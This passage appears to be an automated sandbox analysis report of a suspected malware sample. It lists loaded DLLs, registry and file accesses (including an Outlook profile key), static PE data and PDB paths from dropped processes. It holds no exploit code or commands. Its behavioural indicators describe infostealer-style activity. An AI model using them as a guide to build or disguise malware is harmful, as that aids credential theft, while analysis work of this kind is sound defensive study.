Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sx8RE6LbG0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
